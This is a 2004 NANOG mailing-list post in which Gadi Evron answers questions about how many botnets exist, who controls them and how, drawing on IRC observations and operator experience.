North American Network Operators Group

Date Prev | Date Next | Date Index | Thread Index | Author Index | Historical

what we do know about botnets - per your questions [was: How manybackbone ...]

  • From: Gadi Evron
  • Date: Thu Dec 02 17:49:53 2004

Rich Kulawiec wrote:
On Thu, Dec 02, 2004 at 04:18:52PM -0500, Hannigan, Martin wrote:

Can you direct me toward a singluar entity of 1MM bots controlled by
a single master?
Nobody can, except the single master who's in control of same, and
whoever that is -- if there is -- is unlikely to voluntarily share
that information publicly.
Back in 1997, a luser showed up on IRC in one of the help channels that formed to help users get rid of Trojan horses (after the big return in `96 - no hat Trojan horses ever really went away). The guy was a spammer. He owned nekkidchicks dot something.

He studied the works, and disappeared 6 months later. This is a losing battle, a tsunami we are now trying to stop with stones and sticks.

Actually, these kids share them like candy, as a friend of mine likes to say. I doubt there is just one singular master. It's the macro level we see, why not take the macro level into account?

That's part of the problem: we know that that are huge numbers of
them.  How huge?  10e7 was probably a good estimate early in 2004,
10e8 is starting to look plausible given reported discovery rates.
And the quasi-related problem of spyware/adware is exacerbating it:
it's not like that cruft is exactly fastidious about making sure that
it doesn't open the door to things worse than itself.
In most network, I see about 50% of the traffic being spyware/malware related.. and that's in good cases. But than again, these are only my observations.

We don't know how many there are.
Does it matter? I believe we can call it an epidemic and move on.

We probably can't know how many there are -- unless they do something
to make themselves noticed, and surely those controlling them are smart
enough to realize this and keep plenty in reserve.  We can only know how
many have made themselves visible, and even knowing that's hard.
I can tell you that 50-90% of the occupants of the different IRC networks are drones. The 5 big IRC networks have between 20K and 150K lusers at any given time. You add the numbers.

We don't know who's controlling them: are we up against 10 people or 10,000?
Much like with any social structure, it is difficult to say.

Is someone a hacker, a cracker or a kiddie? They still do what they do, regardless of who they are and what their capabilities are.

Kids trade them like candy, spammers use them to spam. Organized crime does what organized crime does. People who want to be anonymous stay anonymous. Gangs get protection money (absurd on the net, if you pay in real life you at least know you won't be attacked, and if you would be by someone else, this gang you paid would protect you - doesn't work online).

Then there are those who just like to feel like God. Go figure.

We don't know everything they're doing with them.
It doesn't matter. They are there. They can do whatever they want with them. It is an epidemic and it has been growing for years.

We don't know everything they're going to try to do with them.
See above. Irrelevant.

We don't know where they'll be next: they may move around (thanks to DHCP
and similar), may show up in multiple places (thanks to VPNs) or they
may *really* move around (laptops).

We don't know how many are "server" systems as opposed to end-user systems.
Depends on the malware discussed. I can give you many examples.

Sometimes there are several types used by one controller/runner, whose entire wish is to (a) recruit new drones, (b) use them to spam/network-scan to recruit new drones, (c) use these to spam for money and (d) have backup.

I have seen similar set-ups on Yahoo! chat and on IM. It is not limited to one media.

On Yahoo! (which basically does nothing about abuse) you can recruit, or more like.. draft.. a 10K net in a couple of days.

We don't know how to how to keep more from being created.
People are stupid. I don't have a solution. Maybe not allow this s**t to go through our networks? It is becoming an hazard to their operation.

We don't have a mechanism for un-zombie'ing the ones that already exist
(other than laboriously going after them one at a time).
We used to de-zombie them. You can try and "make like a zombie" and see what a controller/runner does, or reverse engineer a sample and see what the passwd and commands are. You can send it out in an IRC channel or remotely connect to all of them.
Some of it is legal, some of it is very shaky, legally.

Non of which is a solution.

We don't have a means to keep them from being re-zombied -- just as soon
as the latest IE-bug-of-the-day hits Bugtraq.
Or one from last year.. makes no difference. And they do get re-zombied. Users are stupid. And I used to think NOBODY is really stupid.. I was wrong. Stupid in this case may mean "needs to earn a driving license for a computer as he/she are clueless".

We don't have a viable way of controlling their actions other than
disconnecting them entirely: sure, blocking outbound port 25 connections
stops them from attempting spam delivery directly into mail servers, but
surely nobody is so naive as to think those controlling these botnets
are going to shrug their shoulders and give up when that happens?
There are all kinds of other things they could be doing.  *Are doing*.

We don't have a clear understanding of who they're being controlled:
are they quasi-autonomous?  centrally directed?  via a tree structure?
do they "phone home"?  are they operating p2p?  all of the above?
All of the above, P2P is not really viable currently though. Nobody solved the problem of exposure when trying to control the network. IRC has it's flaws.. but it works out great for them now.

And so on.

But we darn well should find out.
Feel free to email me. This is all I'll say here.